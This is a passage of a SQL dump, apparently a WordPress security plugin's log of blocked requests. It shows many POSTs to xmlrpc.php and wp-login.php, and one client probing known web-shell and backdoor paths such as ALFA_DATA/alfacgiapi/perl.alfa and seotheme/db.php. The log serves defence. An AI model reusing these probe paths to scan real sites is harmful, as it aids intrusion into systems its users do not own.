Safari\\/537.36\"}','9TzRpLolVOAjgDQv4sekGKuf',0,1680913545.5647,728,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','N7A5XCItQDyiYJeb0KPSpVqo',0,1680914703.3315,2051,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','gnMfHxhyF1sZuwWPLKo6Xl5a',0,1680914714.7661,578,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','duk9lav4zoKCFEcmN7RjPtV1',0,1680914718.5682,1408,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','8Cn05qwhJv9UkstipF7OgWAZ',0,1680914719.4658,1128,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','PFQaexjSi4zZCYl03kr1oEq5',0,1680914725.7374,628,'','POST',403,0,515,0,1,'',0),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','nDXuj4t8AhHbTWsJroQCagYc',0,1680914728.6802,804,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','6mq9uOa2XAsD8clLCYVQnEJ1',0,1680914730.1090,586,'','POST',404,0,515,0,1,'',0),('37.120.210.211',628675283,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IQsAB6jOrR4twYgNHEDf5vMc',0,1680914768.6033,1922,'','POST',403,0,515,0,1,'',0),('205.185.122.226',3451484898,'','https://www.cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11B554a Safari\\/9537.53\"}','ysCOhknfGQ2l9MvDWEc8HJ53',0,1680914957.4490,559,'','POST',403,0,600,0,1,'',0),('89.249.74.213',1509509845,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','SuQokOU64VNyZw7DfdPzBJKg',0,1680915553.1840,1010,'','POST',403,0,515,0,1,'',0),('111.231.4.211',1877411027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','vgrRl8nMx69cCLJbfGQmP7Zi',0,1680916590.8283,4145,'','POST',403,0,515,0,1,'',0),('155.94.140.179',2606664883,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','0lYfWv785wCOFtRmkzXNhsMS',0,1680916594.1458,1438,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','8RU7LoDbz0NGTQpngKVJshMc',0,1680916603.5787,561,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','fT2Sq0NICZmw4opBGAeJkOYL',0,1680916605.2280,594,'','POST',403,0,515,0,1,'',0),('192.96.200.110',3227568238,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','FSBYbicvXQkmyzt5hM8Du9qp',0,1680916617.9682,1901,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','7sxJvwehMiB0YW9PdKVQZ1aE',0,1680916619.1542,1706,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','s1ODuWPQkHNtyafB7bYESZ2r',0,1680916626.5333,618,'','POST',403,0,515,0,1,'',0),('194.36.111.59',3257167675,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iDhpYlWKBNHaPkEecVA1uQtm',0,1680917284.6953,699,'','POST',403,0,515,0,1,'',0),('146.70.76.43',2454080555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IcGqM4zf59V3Db8gnrwiAl6t',0,1680917905.9720,721,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','C64Q3HbF9oVxIPpGqiySkENO',0,1680918907.1510,1788,'','POST',403,0,515,0,1,'',0),('140.174.6.37',2360215077,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','iUYyHaBzdfg17jJTQw6xoN3A',0,1680918908.2877,1034,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','nIadDE9hHuX7qVBjgxJrSbcA',0,1680918910.9044,610,'','POST',403,0,515,0,1,'',0),('162.0.217.70',2717964614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','knhA0yTrjDvPcgl4VEuiBZsI',0,1680918916.6755,779,'','POST',403,0,515,0,1,'',0),('120.27.216.32',2015090720,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9thNGnrxCU8J5iZy0agKwjPu',0,1680918923.9002,1341,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','0FwqVrYEU2iQBDk4ofShnxaZ',0,1680918924.1565,1299,'','POST',403,0,515,0,1,'',0),('103.187.168.176',1740351664,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','7HOEdJ8TLfe4QsC6iNy9gWaX',0,1680918928.9149,576,'','POST',403,0,515,0,1,'',0),('93.186.120.193',1572501697,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','A7MwgO8DrjQmsup0c3Po52lL',0,1680918932.3053,561,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','REjiOuKLCMm5b4WQySctPpgr',0,1680918942.2963,541,'','POST',403,0,515,0,1,'',0),('184.168.115.25',3098047257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','aVQBepLydFE7CHSb8u3jP4KJ',0,1680918946.5609,547,'','POST',403,0,515,0,1,'',0),('157.245.152.250',2650118394,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','yw041qJGQkFSCRDOn8Zpf62g',0,1680918950.2206,570,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','o9lCQtjsERKnbH8vNZV2gO0X',0,1680919120.0487,584,'','POST',403,0,515,0,1,'',0),('20.150.218.12',345430540,'','http://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','k4s8m3LQfAxX7TKEBeW0uJ2a',0,1680919504.4423,1613,'','POST',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ey0zlLXIrJhG1sS75NtPfdmU',0,1680919504.4483,1606,'','GET',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','https://cmdev-site1.com/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','c6WK7wBkYFjr08TxG1UQAI4u',0,1680919507.4493,698,'','POST',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','https://cmdev-site1.com/alfacgiapi/perl.alfa','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','uNqgYPl7y5fkisrpawJ6ScX0',0,1680919509.4917,362,'','POST',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','p16GIAnhgDmKjtF34RYS0yaL',0,1680919510.4058,344,'','GET',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','https://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fYEQikINdMRgBKmTWXrsOUxF',0,1680919511.4469,332,'','POST',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','2D1PmAeVbXCt5cpKOjnQJNlz',0,1680919516.6702,300,'','GET',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','o98KRfiW5MSwXlbOZDHeCY3B',0,1680919518.1103,292,'','GET',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','4Gm9Pz3xIlF6JXnQdAKfgYLo',0,1680919519.6914,286,'','GET',403,0,700,0,1,'',0),('20.150.218.12',345430540,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','CBGgz5skLOUAaVY6bKpc2HrP',0,1680919521.1426,471,'','GET',403,0,700,0,1,'',0),('213.152.161.219',3583549915,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JQ8KNpr4DXz3e6k01fEbVgSh',0,1680921197.8997,3988,'','POST',403,0,515,0,1,'',0),('213.152.161.219',3583549915,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','f8Z4mtGCNyqXSrF7wcpahk2n',0,1680921269.2399,563,'','POST',403,0,515,0,1,'',0),('213.152.161.219',3583549915,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','l1QqMuYDtkb47pEmG05hFWoV',0,1680921330.5767,417,'','POST',404,0,515,0,1,'',0),('213.152.161.219',3583549915,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bEr8cpZAMOWoSmwG3U4zf2VC',0,1680921334.3523,400,'','POST',404,0,515,0,1,'',0),('213.152.161.5',3583549701,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','epBcfDAKxMrb05V813oH7TOI',0,1680921619.5228,3678,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ER96dYqG84jQAMUorH3VWNK7',0,1680921821.2943,1755,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','E20KCaIN9yMuwFPBH8tJUcQY',0,1680921893.2655,1300,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','rCiJUDGoj1X3WP8A0vSa6wLh',0,1680921892.8267,2170,'','POST',403,0,515,0,1,'',0),('193.141.65.220',3247260124,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','43bOq0VcNUfBHphEmSdn1MJ6',0,1680921902.4709,1480,'','POST',403,0,515,0,1,'',0),('192.111.150.75',3228538443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','0qQj6iLmMwPt2lvREGNVep8y',0,1680921905.6280,648,'','POST',403,0,515,0,1,'',0),('47.242.191.83',804437843,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','Jo36za8LYqh4MlUZvmrt1Gne',0,1680921918.0074,1267,'','POST',403,0,515,0,1,'',0),('154.221.18.150',2598179478,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','MTNhKix8rW9PC2eafGJm6cAp',0,1680921918.3689,1170,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','YUZ015bhzQK74fcsu9mOi6IR',0,1680921923.3393,568,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','CYzDWsoBMIcgm5LjbN0EfkFv',0,1680921925.3732,2268,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Ez05uAD7jpkMOF3oYqBlXagi',0,1680921925.2758,2373,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','HPoTAF7j4kBOXCQzg8bpfiqZ',0,1680921925.8422,1998,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','2wJiAELDF9Q6V5gZP78ylRdu',0,1680921938.9642,595,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','MoFsBZUYxjyJiuDwPk0a597f',0,1680921945.7655,615,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','7zmSK5Fh0O6MYaoB8JxQCVds',0,1680921946.5019,605,'','POST',403,0,515,0,1,'',0),('213.152.187.220',3583556572,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6ZzqaG08dKYmTinex1FoyjL4',0,1680922872.8949,3780,'','POST',403,0,515,0,1,'',0),('213.152.161.138',3583549834,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Zg3GdPlJIrjbkEzyc2sTU48O',0,1680925941.5462,4058,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','TLgiXxBRJmVH1lrCGq3A5Fbd',0,1680926948.4862,2790,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','qiSydF2eNnpEJWBTCMg7LuO9',0,1680926949.2462,2030,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','oSvGTd6cFYqDQHJBuMyIfi3V',0,1680926953.6668,590,'','POST',403,0,515,0,1,'',0),('45.195.25.73',767760713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','14es6gMJPk3No7EBaR85ilQy',0,1680926956.2623,552,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','xzP3gKtJEuWlf7QYRVps8XF1',0,1680926964.3000,596,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','Q547MHwKzS3rD1WIkxRTisdy',0,1680926968.0852,586,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','Gh7iEBVKZzu1w8blaokfNydq',0,1680926978.0610,575,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','p0fxh2GTHLEaOgloYrWKc7QF',0,1680926990.6224,1486,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','qUJGo2E1vlTAgwCDKXybQhca',0,1680926994.5487,565,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','nQ1cvf3p0T5hVLN7mICU6Yjk',0,1680927007.3639,1598,'','POST',403,0,515,0,1,'',0),('62.171.160.188',1051435196,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','mda5XePU4BNEsO3jDlwHMFIv',0,1680927281.9795,2562,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','vPB5IRoJWh06NcMKaZfuHUDx',0,1680927281.3461,3203,'','POST',403,0,515,0,1,'',0),('185.179.82.133',3115537029,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','z7c5jLyS6AVXgK0hGJqv14kt',0,1680927282.3701,2275,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','KUixa8J6SchR3HrzljybW5N7',0,1680927291.3197,1457,'','POST',403,0,515,0,1,'',0),('103.71.99.168',1732731816,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','d4Ol2Dx9f6ApQkeogshWBiTJ',0,1680927298.6297,567,'','POST',403,0,515,0,1,'',0),('43.240.66.51',737165875,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','RbBwdyVZQrpcoPSmEtOTsWYl',0,1680927319.2970,781,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 